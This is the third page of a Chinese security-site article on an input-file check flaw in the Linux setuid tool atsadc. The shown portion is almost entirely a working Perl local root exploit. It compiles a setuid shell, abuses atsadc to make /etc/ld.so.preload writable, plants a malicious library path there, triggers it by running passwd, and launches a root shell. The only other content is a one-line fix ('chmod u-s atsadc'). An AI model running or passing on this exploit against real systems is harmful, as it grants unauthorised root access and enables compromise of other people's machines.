Linux atsadc 输入文件检查漏洞(3)

日期:2020-06-09 栏目:程序人生 浏览:

  char *a[] = {"/bin/sh", 0};

  setuid(0); setregid(0, 0);

  execve(a[0], a, 0);

  return 0;

  }

  _EOF2_

  close O;

  print "Compile shell ...\n";

  $foo = `cc /tmp/boomsh.c -o /tmp/boomsh`;

  umask 0;

  print "Invoking vulnerable program (atsadc)...\n";

  $foo = `atsadc 2 1 /etc/ld.so.preload`;

  open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";

  print O "/tmp/boom.so";

  close O;

  $foo = `/usr/bin/passwd`;

  # let it look like if we have sth. to do. :)

  sleep 3;

  print "Welcome. But as always: BEHAVE!\n";

  system("/tmp/boomsh");

  建议:

  临时解决办法: chmod u-s atsadc

上一篇:RedHat Linux dump 缓冲区溢出漏洞‎
下一篇:Linux wmcdplay 缓冲区溢出漏洞

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwpwxd.html

相关推荐